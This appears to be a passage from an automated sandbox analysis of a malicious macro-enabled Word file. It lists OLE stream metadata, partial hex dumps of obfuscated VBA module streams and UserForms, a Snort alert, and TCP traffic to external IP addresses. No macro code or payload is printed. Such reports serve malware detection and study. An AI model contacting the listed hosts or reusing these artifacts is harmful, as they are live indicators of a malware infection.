                                                                                                                              Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                              Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                              Stream Path: Data, File Type: data, Stream Size: 99195
                                                                                                                              General
                                                                                                                              Stream Path:Data
                                                                                                                              File Type:data
                                                                                                                              Stream Size:99195
                                                                                                                              Entropy:7.38970239713
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:{ . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . . . . . . D . . . . . S . . F . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . .
                                                                                                                              Data Raw:7b 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                                                                                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 894
                                                                                                                              General
                                                                                                                              Stream Path:Macros/PROJECT
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:894
                                                                                                                              Entropy:5.30543445279
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:I D = " { 9 E 7 4 B F 6 0 - 7 1 9 9 - 4 B 1 2 - B 7 4 3 - 4 4 A 8 F B E E D 2 3 6 } " . . D o c u m e n t = D k 5 a t t 0 c u _ 9 j s b / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = L x v i n h y q 0 h u 0 i . .
                                                                                                                              Data Raw:49 44 3d 22 7b 39 45 37 34 42 46 36 30 2d 37 31 39 39 2d 34 42 31 32 2d 42 37 34 33 2d 34 34 41 38 46 42 45 45 44 32 33 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d
                                                                                                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 278
                                                                                                                              General
                                                                                                                              Stream Path:Macros/PROJECTwm
                                                                                                                              File Type:data
                                                                                                                              Stream Size:278
                                                                                                                              Entropy:3.75500935024
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:D k 5 a t t 0 c u _ 9 j s b . D . k . 5 . a . t . t . 0 . c . u . _ . 9 . j . s . b . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . L x v i n h y q 0 h u 0 i . L . x . v . i . n . h . y . q . 0 . h . u . 0 . i . . . V h r 7 v b 1 s 1 h g s . V . h . r .
                                                                                                                              Data Raw:44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 00 44 00 6b 00 35 00 61 00 74 00 74 00 30 00 63 00 75 00 5f 00 39 00 6a 00 73 00 62 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72
                                                                                                                              Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62034133633
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62970308443
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.63438395848
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62402723855
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62202697924
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5949
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                              File Type:data
                                                                                                                              Stream Size:5949
                                                                                                                              Entropy:5.26993168344
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                              Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1039
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/dir
                                                                                                                              File Type:data
                                                                                                                              Stream Size:1039
                                                                                                                              Entropy:6.60831708882
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . d . m . . A . ! O f f i c .
                                                                                                                              Data Raw:01 0b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 99 86 d0 61 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                                                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 43108
                                                                                                                              General
                                                                                                                              Stream Path:WordDocument
                                                                                                                              File Type:data
                                                                                                                              Stream Size:43108
                                                                                                                              Entropy:3.69797214633
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8c a3 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a8 00 00 70 61 21 5c 70 61 21 5c 8c 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                              02/01/21-23:18:24.263263TCP1201ATTACK-RESPONSES 403 Forbidden804916970.32.23.44192.168.2.22

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Feb 1, 2021 23:25:15.806587934 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.843477964 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.843609095 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.867645025 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.905683994 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906677008 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906698942 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906718016 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906827927 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.912910938 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.950129032 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.977408886 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.050429106 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.519890070 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.519928932 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.519994020 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520045996 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520076036 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520131111 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520162106 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520207882 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520266056 CET44349742194.209.195.106192.168.2.4
